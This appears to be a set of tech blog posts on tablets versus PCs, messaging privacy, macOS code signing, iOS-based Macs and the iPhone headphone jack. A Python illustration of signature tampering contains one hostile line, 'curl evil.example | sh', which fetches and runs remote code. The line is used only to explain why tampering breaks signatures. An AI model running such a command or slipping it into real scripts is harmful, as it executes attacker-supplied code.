Pity the poor personal computer. Its time is swiftly coming to a close, eclipsed by its progeny, the tablet. Hampered by legacy architecture and legacy operating systems, the PC will soon fade away from desks at home and in offices. Instead, PCs will live out of sight and out of mind, stacked to the rafters in server closets and data centers. A dignified end for a technology that changed the world.
Well, let’s not be too hasty. Steve Jobs’s famous metaphor about trucks and cars from the iPad introduction is an apt way of thinking about tablets and PCs, but only up to a point. In the intervening years, tablets have gained capabilities on par with (light) trucks, as in the case of the iPad Pro. During the same time, PCs have become more car-like, as in the single-port retina MacBook. And that’s muddied the waters plenty, without even getting into the world of convertible hybrid tablets, Windows 10, and Chromebooks.
I’ll put myself in the camp that says laptop/tablet hybrids are a short-term solution until the tablet and PC divide fully shakes out. The dividing line will be drawn when we establish the things a traditional personal computer can do that a tablet can’t—and vice versa. There are some clear lines now: you can’t develop applications on an iPad, for the most part, though this is certainly going to change. You can’t do heavy graphics work, or anything more complicated than the most basic audio and video editing, but this is only for now.
More difficult to change is how tablets are locked to themselves. You can’t use a tablet with an external display, except to do a presentation. There are limited options for input and output, as well. Latency and transmission speeds for wireless connections will improve with time, but for now, anything that must be real time for input or output is hampered. What wireless solutions we have now for the tablet to escape itself are kludges and hacks.
As tablets get more powerful, they will expand to allow you to do what you can do on your traditional PC. In tandem, PCs will become more powerful too. A PC, even in a laptop form factor, has more headroom for computing power. This goes not just for the size of the chips, but also for thermal headroom. Nobody wants a tablet with a cooling fan, after all. The increased computing headroom of the personal computer opens it up to all kinds of new applications that will, in time, trickle down to the tablet. By then, the personal computer will have moved on to applications that demand even more power.
It’s better to think of the tablet as a sort of computing appliance. You buy it, and it serves its purpose of giving you the best of basic personal computing. When it gets old and unsupported, you replace it. You could do this in the PC world, but it’s easier just to upgrade the components. That’s impossible on a tablet without a soldering iron, specialized components, and a lot of patience. Some bemoan the loss of upgradability, and we see it coming to the PC too, as it becomes more “car”-like. I’m not sure it’s such a bad thing.
How many of the problems that plagued PCs back in the day were a result of the componentized nature of the platform? Stick a bad RAM stick in your PC and watch things go sideways real fast. I know for a fact that part of why Windows is such a pain, even today, is that it needs to support a nearly infinite number of hardware configurations. Not everything will work well together. Upgradability of a PC’s components is nice and convenient, but opens up so much potential for hassle. Better to just plug stuff in without opening the case. At least there’s less possibility for things to go wrong. A point for the tablet, but also for the tablet-ified PC.
But why do you need more power right there at your fingertips, anyway? What about the Cloud? Who needs a computer at your desk, when the tablet (or ultra-portable PC) can offload its storage, processing power, and whatnot to some box somewhere in a data center? We’re closer to making this a reality than we were when Larry Ellison proposed his Network Computer, but connectivity is the enemy again. American broadband is still crap, and it’s crap in a lot of other countries too. Unless getting data to and from that remote machine is as fast as on a local one, this idea is stuck.
The biggest obstacle to tablets, though, is the entrenched culture of the personal computer in workplaces. Yes, there are some progressive companies that are integrating tablets into daily work life, but existing limitations mean that your average workplace isn’t going to be able to swap out everyone’s laptop with a tablet any time soon. This goes double for desktops. There are those who suggest that once the children of the tablet age, whose first computing experience was an iPad or iPhone, enter the workplace, employers will have to migrate to tablets. That’s not the case at all.
Kids growing up into a workplace IT culture built around PCs is not enough to shake things up. As anecdata, I know most kids in my age bracket, at least in the US, grew up with Macintoshes as the primary computers in their schools. (Hell, my middle school had Apple IIs in the computer lab until I was in 8th grade.) Macs have made more inroads in the office, but of the six jobs I had after graduating college, only two were primarily Macintosh IT environments. Both were tech jobs. If a whole generation of kids weaned on the Macintosh couldn’t get Macs on desks at your average workplace, what makes you think kids raised on tablets will?
None of this is to say that a tablet-first future isn’t coming. There needs to be something compelling enough to disrupt the entrenched legacy of the personal computer at home and at work. Tablets will get there first in the home. They already provide an easier way for people to do most of the ordinary computing tasks they would do on a PC. A few more iterations and OS upgrade cycles, and the tablet will be your average user’s primary computing device. The office, not so much.
For the time being, the PC will rule the desk. That is, unless you fit a specific niche where you can live within a tablet’s limitations. Over time, yes, the tablet’s limits will fall away, and tablets will let you do more, with more. We’re not there yet, and I don’t see it happening for at least a decade. The thin edge of the tablet wedge has gotten in, however. It’s only a matter of time. Just don’t assume your next traditional computer will be your last.
There’s tension when it comes to technology companies and encrypted messaging. Snowden’s revelations about PRISM and other NSA spying through tech companies have them promising more encryption to protect their public image. Yet, if they use good encryption that governments can’t get their tendrils into, and if they do it by default, there’s someone else who can’t spy on people’s conversations: the companies themselves.
If Facebook is encrypting users’ conversations, it can’t mine that data for its own uses. That includes stuff like the News Feed algorithm, its digital assistant M, and—biggest of all—the data it sells to advertisers. That last one directly affects the company’s bottom line. It’s the same with Google, Microsoft, Snapchat, and any other advertising-supported company that isn’t end-to-end encrypting messages by default. Whatever claims they want to make about valuing user privacy, and all that jazz, as long as they’re peeking into what you’re saying and doing, your conversations aren’t private. End of story.
Even with encrypted messaging, the provider does have to store something to make it work. Signal, which is end-to-end encrypted, revealed that the FBI subpoenaed its user data. It doesn’t have much: “only account creation date & last login time,” according to Edward Snowden. Apple, too, logs some user data, such as who you messaged and when, but not the content.
In the case of Apple, this is the sort of metadata that the NSA claims to have collected on phone calls. It’s still dangerous if it gets out—or subpoenaed—but it’s not great for marketing purposes. Advertisers are less interested in who you’re talking to, and more about what you’re talking about. This is why chatbots are so sinister. By presenting a friendly, playful personality that promises to do whatever you ask it to, chatbots are excellent tools for extracting your personal data. And what better way to get a good deal on a partnership with a company to integrate with your chatbot than promising to share valuable user data with them?
Messaging, even when you’re not talking about anything “important,” is a gateway into our most intimate selves. That’s why that data is so precious to the NSA, to other governments, and to advertisers. By presenting a messaging service as private and secure, even when it’s not by default, a tech company can bypass yet another defense mechanism savvy users rely on to keep prying eyes out of their lives. Even worse, most ordinary users aren’t going to even know or care, as long as the service does what they want, and does it well.
This is what everyone is banking on. Without education about the potential of mass data collection by private companies and government agencies alike, most people won’t be aware of the risks. Without a compelling narrative about why people should care, education about the risks will just be ignored. We all have something to hide, not necessarily illegal things, but aspects of ourselves we want to keep between us and the human being on the other end of the line. If we can’t keep people from prying into this most intimate space of our digital lives, what will convince them to butt out?
The dream of personal computing is unfettered access to and control of powerful hardware that you can make do anything your little heart desires. The reality of personal computing, at least in the internet age, is that you, and everyone else with a connection, have barely fettered access to and control of your hardware. I don’t know if you can still plug a Windows XP machine into the Internet without a malware filter and have it turn into part of a botnet overnight, but it sure was that way for a while. I wouldn’t dare stick even a modern Windows 10 machine on the open web without something to protect it.
When anything can be accessed, when there are countless people (individuals, businesses, and states) all poking and prodding to find any possible weakness in the software and hardware we use, something has to give. In the case of Apple, it’s the freedom to run any random app on your iOS devices. Apple vets what is allowed to run on your iPhone and iPad, and it takes modifying the core software to change that. The big fear among some is that this will, eventually, come to the Mac, and that this will be the end of days for free, open, personal computing. Hence the concern over recent changes to Gatekeeper, the macOS tool for ensuring software is safe, that make it harder to run unsigned apps.
What code signing does is allow a user to know that the app in question was created and distributed by a developer who has, at bare minimum, coughed up $99 a year for an Apple Developer Account. The intention is not necessarily a money grab, but a security measure, so that Apple, and the user, can know if an app has been modified and can identify the author.
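The core promise can be sketched in miniature. Real code signing uses public-key certificates issued by Apple, verified by tools like Gatekeeper, not a shared secret; but a simple keyed hash illustrates the essential property: any modification to the signed bytes invalidates the signature. Everything here (the key, the “app” bytes) is hypothetical:

```python
import hashlib
import hmac

# Stand-in for the developer's signing identity. (Actual code signing
# uses an asymmetric certificate chain, not a shared secret like this.)
DEVELOPER_KEY = b"hypothetical-developer-secret"

def sign(app_bytes: bytes) -> str:
    """Produce a signature over the app's exact contents."""
    return hmac.new(DEVELOPER_KEY, app_bytes, hashlib.sha256).hexdigest()

def verify(app_bytes: bytes, signature: str) -> bool:
    """True only if the app is byte-for-byte what was signed."""
    return hmac.compare_digest(sign(app_bytes), signature)

original = b"#!/bin/sh\necho hello\n"
sig = sign(original)

# Simulate malware injected into the app after signing.
tampered = original + b"curl evil.example | sh\n"

print(verify(original, sig))   # True: the untouched app passes
print(verify(tampered, sig))   # False: any modification breaks the signature
```

This is why the Transmission incidents below were so serious: the attackers didn’t just modify the app, they compromised the signing key itself, so the tampered app verified as genuine.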
It’s not perfect, by any stretch. The BitTorrent client Transmission got malware injected into it, and its code signing key compromised. Twice. If the purpose of code signing is a trust measure to confirm that an app you download and install off the open web is safe, this is a failure, though likely a failure on the Transmission team’s part.
Code signing is also inconvenient. If you don’t have $99 a year to get your Apple Developer ID, you’re stuck up a creek with an unsigned app that is now harder for your potential audience to use. For open source apps, this is a huge pain in the behind, since someone now needs to serve as benefactor if they want a signed Mac version. Not every open source project will want or be able to afford that.
Yet, nearly five-hundred words in, I can’t say I’m terribly upset by this development for the reasons I brought up at the start. Free, unfettered, open computing is dangerous as hell. Being able to arbitrarily execute any piece of code that lands on your computer is a massive risk, and we’ve seen what happens when there’s no protection. If you need a reminder, go spin up an unpatched Windows XP VM or two.
Let’s face it. Users are idiots. All users. Even you and me. Even the top computer security experts, whether they’re working for Apple or the NSA, are liable to do something very stupid when they have to make a decision to keep their computers safe. Hell, case in point, some NSA operative left a powerful hacking tool on a server where it was compromised. What makes you think that you, smart and savvy computer user, won’t accidentally install a compromised executable and turn your machine into part of a botnet?
Restricting the average user’s ability to run random software is, as painful as it might sound, for their safety. It’s protection not just from malicious actors, of which there are many, but protection from their own idiocy. There’s no way to allow a computer to run arbitrary code and protect a user from the consequences thereof. With so much of our lives entangled in a web that treats privacy as garbage, not preemptively locking things down is downright stupid.
Conversely, it should be possible for a user to open those locks. It shouldn’t be easy, it shouldn’t be obvious, and it should require them to absolve their OS provider of choice from responsibility if—or when—something blows up in their face. Digital security is doomed to be a cat-and-mouse game for eternity. That doesn’t mean we should make it easier for the cats in the interest of… what, exactly? The average person does not want to think about how to protect themselves, they just want their stuff to work.
That needs to be the priority: keep everyone safe, and keep everyone running. You can do this without crushing the freedom to make software, even free software. It’s valid to quibble about Apple making their $99/year Developer Program mandatory for developers who just want to make and distribute an app, too. Despite that, a system that offers a signing certificate to anyone with a pulse isn’t going to be secure either. We’re doomed no matter what, but a solution that keeps the user as safe as possible for as long as possible is the best option we have.
So, the chip in the new iPhone is faster than any MacBook Air. The pure silicon power in the A10 is fueling another round of speculation about whether iOS will come to the desktop. The idea has been floated here and there for the past few years, but it’s faded into the background as iOS gains more Mac features, and macOS gains more iOS features. Personally, I don’t think iOS will come to the Mac any time soon. What I think will happen is something a bit more radical: a new version of macOS built with the underpinnings of iOS instead.
It’s not as crazy as it sounds. If you recall the original iPhone announcement, Steve Jobs didn’t say the iPhone ran iPhone OS, he said it ran OS X. It’s not exactly OS X, but iOS and macOS have the same technology at the core. iOS also serves as the underpinnings of Apple’s other two operating systems: watchOS and tvOS. Thought of this way, iOS began as a stripped-down, mobile- and touch-optimized version of macOS. In the past decade, it’s been built back up with modern, touch-first mobile computing as its focus.
Every version of iOS since the initial release has added new features and extensibility of the type we take for granted in modern desktop OSes. Yes, iOS isn’t at the point where it has feature parity with the Mac on an OS level, by any measure. But it’s not unreasonable to assume that, with a few more years of development time, iOS will reach parity with modern macOS. One example of this future is the upcoming Apple File System, which is planned to run on all Apple devices. That’s some serious unification.
If the pattern holds, I expect to see a new version of macOS built on the iOS code base, optimized for desktop features, and possibly even running on ARM chips. There’s almost certainly a version of macOS as we know it today running on ARM, but if Apple can jettison on the Mac the same legacy crap they let go of for iOS, I don’t see why they wouldn’t. How many of the issues we deal with on the Mac (not related to outdated hardware) are from fifteen years of accumulated cruft? Or longer, if you count the baggage from the NeXTSTEP days.
None of this is going to happen for a while. We’re only a decade out from the last processor transition in Macintosh hardware. While the Intel transition was pretty seamless, a transition to ARM Macs will bring one major hassle: the loss of Windows compatibility. Perhaps if an A15X chip of some sort is powerful enough to do real-time CPU emulation without a huge speed crunch, it won’t be an issue. Or, maybe, Windows for ARM will become a thing again. Either way, it’ll be a hell of a transition. Apple’s done it twice before, though. I’m excited to see how a desktop OS built on iOS would work, even if it still looks like macOS. And I’d put safe money down that it will.
The furor over the iPhone 7’s headphone jack, or lack thereof, seems to be fading. It was doomed to be a non-issue anyway, so I’m not surprised. This is, in part, because Apple was so far out in front of the reveal, and because it’s a minor inconvenience at worst. Charging and listening via wired gear at the same time is still a concern, but solutions will come down the pike for that. Just wait a month or two, or join us happy Bluetooth headphone users in the wonderful world of wireless listening. You don’t even need $160 AirPods to do it.
But there’s still some cause for concern with the removal of the headphone jack. They’re just not the concerns I hear a lot of people screaming about. While I’d need to see a teardown to be certain, evidence suggests that the Lightning to 3.5mm Headphone Jack Adapter is about as passive as you can get with a Lightning dongle. It probably consists of a Lightning adapter chip, a Digital-to-Analog Converter, and an Analog-to-Digital Converter for the microphone on your headset. Square has already come out and said its old 3.5mm headphone jack-based card reader works with the dongle. Other devices that input audio via that jack should work fine, albeit in mono.
I’ve heard some people float the idea that there could be a DRM lockout in future iPhones, or future versions of the dongle, to prevent unauthorized devices. That’s not likely, given how the headphone jack works. As long as there’s a conversion from digital to analog along the path to the speakers, there’s a way to tap it. Even high-resolution, 192kHz/24-bit audio can be output over 3.5mm, as long as it’s stereo. The PonoPlayer doesn’t have any fancy outputs, just two standard 3.5mm jacks, one amplified and one not. Perhaps there could be a kill switch to disable output via the Lightning to 3.5mm Adapter, but why? It could easily be bypassed with a third-party adapter, and all Lightning headphones would have a DAC in them anyway. You’d block legit users and potential pirates alike.
Any potential DRM risk is around other audio formats beyond stereo output. Let us imagine a future where Apple Music provides 5.1 surround sound audio. This is a bit preposterous on the face of it, but work with me. While there are “5.1” headphones, they connect over USB, since you can’t output 5.1 sound through the headphone jack. You can, however, output 5.1 through an optical audio port, and most modern Macs combine optical audio and 3.5mm phone jacks, via the Mini-TOSLINK optical audio connector. The hardware overhead of optical audio, however, makes me doubt there will ever be a Lightning-to-Mini-TOSLINK Adapter.
If you want to listen to 5.1 audio out of your iPhone, you’ll have to hook it to something via Lightning. It would be, at least theoretically, possible to capture each channel of the 5.1 signal after it passes through the DAC, but that’s a lot of work for minimal gain. Plus, I have my doubts Apple will ever bother with 5.1 audio on the iPhone or iPad. If streaming and wireless are the future of audio, bandwidth is too constrained to make high-fidelity and 5.1 worthwhile for the near-future. More importantly, most consumers don’t give two shits about high-fidelity audio or surround sound anyway.
So, I’m not worried about a DRM lockout in a headphone jack-free iPhone ecosystem. Unless Apple decides that you can’t connect any old DAC to a Lightning port, or forces everything to go over Bluetooth or a proprietary wireless method, we’ll be in good shape. When it comes to portable devices and audio, the future is wireless, at least for listening. As long as there’s a supported way to get audio out and audio in—which Lightning supports—over wires, things are going to be okay.
This is a limit of the headphone jack on all iPhones. The TRRS standard commonly used on smartphones has only four contacts: left audio, right audio, ground, and microphone. ↩